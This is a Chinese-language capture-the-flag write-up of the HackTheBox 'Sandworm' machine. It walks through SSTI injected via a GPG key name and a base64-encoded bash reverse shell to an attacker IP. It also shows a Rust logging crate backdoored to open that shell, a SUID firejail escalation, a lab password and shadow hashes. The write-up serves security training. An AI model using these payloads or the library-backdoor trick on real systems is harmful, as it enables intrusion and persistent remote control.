Sandworm - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Sandworm
• 10.10.11.218

端口扫描

22，80，443:

$ nmap -sC -sV -Pn 10.10.11.218
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-19 13:35 CST
Nmap scan report for 10.10.11.218
Host is up (0.093s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp   open     http        nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp  open     ssl/http    nginx 1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA
| Not valid before: 2023-05-04T18:03:25
|_Not valid after:  2050-09-19T18:03:25
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Secret Spy Agency | Secret Security Service
1096/tcp filtered cnrprotocol
9207/tcp filtered wap-vcal-s
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.02 seconds

80/443

需要加hosts：

10.10.11.218 ssa.htb

flask做的某安全公司官网：

PGP

contact那里需要提交pgp加密的信息：

根据提示点进guide，里面是一些gpg功能，加解密，验证签名之类的:

Vertify Signature

后面操作生成一个新的密钥对吧，因为涉及到一些属性修改，避免影响主密钥的功能：

• GPG入门教程 - 阮一峰的网络日志
  https://www.ruanyifeng.com/blog/2013/07/gpg.html

gpg --quick-gen-key miao

gpg --armor --export miao > pubkey.asc
echo 'miao' | gpg --clearsign

使用公钥和签名信息测试验证签名功能，发现输出信息中包含我们密钥设置的一些属性：

SSTI

修改gpg密钥中的属性,根据前面知道是Flask，测试SSTI：

• Modify the GPG UID name - SoByte
  https://www.sobyte.net/post/2021-12/modify-gpg-uid-name/

gpg --edit-key miao
gpg> adduid
Real name: {{7*7}}
Email address: miao@miao.com
Comment:
You selected this USER-ID:
    "{{7*7}} <miao@miao.com>"

就是根据文章一步步来，完成后重新进行前面的步骤，验证签名，发现SSTI执行成功：

reverse shell

然后就是测试各种命令，最终得到atlas shell：

• PayloadsAllTheThings/Server Side Template Injection at master · swisskyrepo/PayloadsAllTheThings
  https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2

/bin/bash -i >& /dev/tcp/10.10.14.16/4444 0>&1

L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE2LzQ0NDQgMD4mMQo=

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE2LzQ0NDQgMD4mMQo= | base64 -d | bash" ').read() }}

信息

firejail

简单的枚举发现是在firejail沙箱里：

httpid

httpie里面一层层翻，admin.json里得到silentobserver密码：

silentobserver
quietLiketheWind22

user flag

silentobserver用户ssh登录：

信息

silentobserver上下文中运行pspy(因为atlas在沙盒里，wget，curl之类的都用不了)，发现root用户定时在atlas用户的上下文中运行和编译在 Rust 中开发的 tipnet 项目:

tipnet

源码和二进制程序我们都有权限查看，测试运行，发现我们的操作都会记录在日志里：

logger

查看代码发现使用了一个外部库logger：

• Extern crates - The Rust Reference
  https://doc.rust-lang.org/reference/items/extern-crates.html

而logger,当前用户有写权限:

shell

那就可以直接修改logger的代码来执行命令，参考这个,修改后不影响原本功能：

• rust-backdoors/reverse-shell/src/main.rs at master · LukeDSchenk/rust-backdoors · GitHub
  https://github.com/LukeDSchenk/rust-backdoors/blob/master/reverse-shell/src/main.rs

wget http://10.10.14.16:7777/lib.rs -O lib.rs

修改后等待tipnet执行，得到没有限制的atlas,写公钥方便后续操作：

lib.rs

extern crate chrono;

use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::process::Command;

pub fn log(user: &str, query: &str, justification: &str) {
    let command = "bash -i >& /dev/tcp/10.10.14.16/4444 0>&1";

    let output = Command::new("bash")
        .arg("-c")
        .arg(command)
        .output()
        .expect("not work");

    if output.status.success() {
        let stdout = String::from_utf8_lossy(&output.stdout);
        let stderr = String::from_utf8_lossy(&output.stderr);

        println!("standar output: {}", stdout);
        println!("error output: {}", stderr);
    } else {
        let stderr = String::from_utf8_lossy(&output.stderr);
        eprintln!("Error: {}", stderr);
    }

    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);

    let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };

    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
}

提权信息

suid firejail,类似之前的Cerberus：

• Cerberus - HackTheBox | 喵喵喵喵 | 某鱼唇的人类
  https://darkwing.moe/2023/03/22/Cerberus-HackTheBox/
• https://seclists.org/oss-sec/2022/q2/att-188/firejoin_py.bin

find / -perm -4000 -user root 2>/dev/null

/usr/local/bin/firejail

能不能跳过中间步骤直接从silentobserver用户到这里的suid firejail呢，实际上是不行的，silentobserver没有权限执行firejail,而atlas用户在jailer组中可以执行：

提权 & root flag

一步步来,还是一样的问题，给的sudo不行，但直接su可以：

wget 10.10.14.16:7777/firejoin.py
# 第一个终端
python3 firejoin.py
# 第二个终端
firejail --join=13520
su -

shadow

root:$y$j9T$Pg7Bm6pt5ZGjXKjHtVx1A0$oUzCb1AdkT8LSqDw/S8epzo8NulMfPH1siYjXUbZl0B:19395:0:99999:7:::
silentobserver:$y$j9T$bCOHQ6BXJpACSRhEUptt50$2gOEbQ08M76nlLu6F5RJX61ufBUDSW67zVfwRdHcsI4:19394:0:99999:7:::
atlas:$y$j9T$G9Wo78J1wNdBpflU3JDbb1$A087OjgjVVM7G/DrtMLWev77DZfpOQU2iidRClpCJbD:19395:0:99999:7:::

参考资料

• GPG入门教程 - 阮一峰的网络日志
  https://www.ruanyifeng.com/blog/2013/07/gpg.html
• Modify the GPG UID name - SoByte
  https://www.sobyte.net/post/2021-12/modify-gpg-uid-name/
• PayloadsAllTheThings/Server Side Template Injection at master · swisskyrepo/PayloadsAllTheThings
  https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2
• rust-backdoors/reverse-shell/src/main.rs at master · LukeDSchenk/rust-backdoors · GitHub
  https://github.com/LukeDSchenk/rust-backdoors/blob/master/reverse-shell/src/main.rs
• Cerberus - HackTheBox | 喵喵喵喵 | 某鱼唇的人类
  https://darkwing.moe/2023/03/22/Cerberus-HackTheBox/
• https://seclists.org/oss-sec/2022/q2/att-188/firejoin_py.bin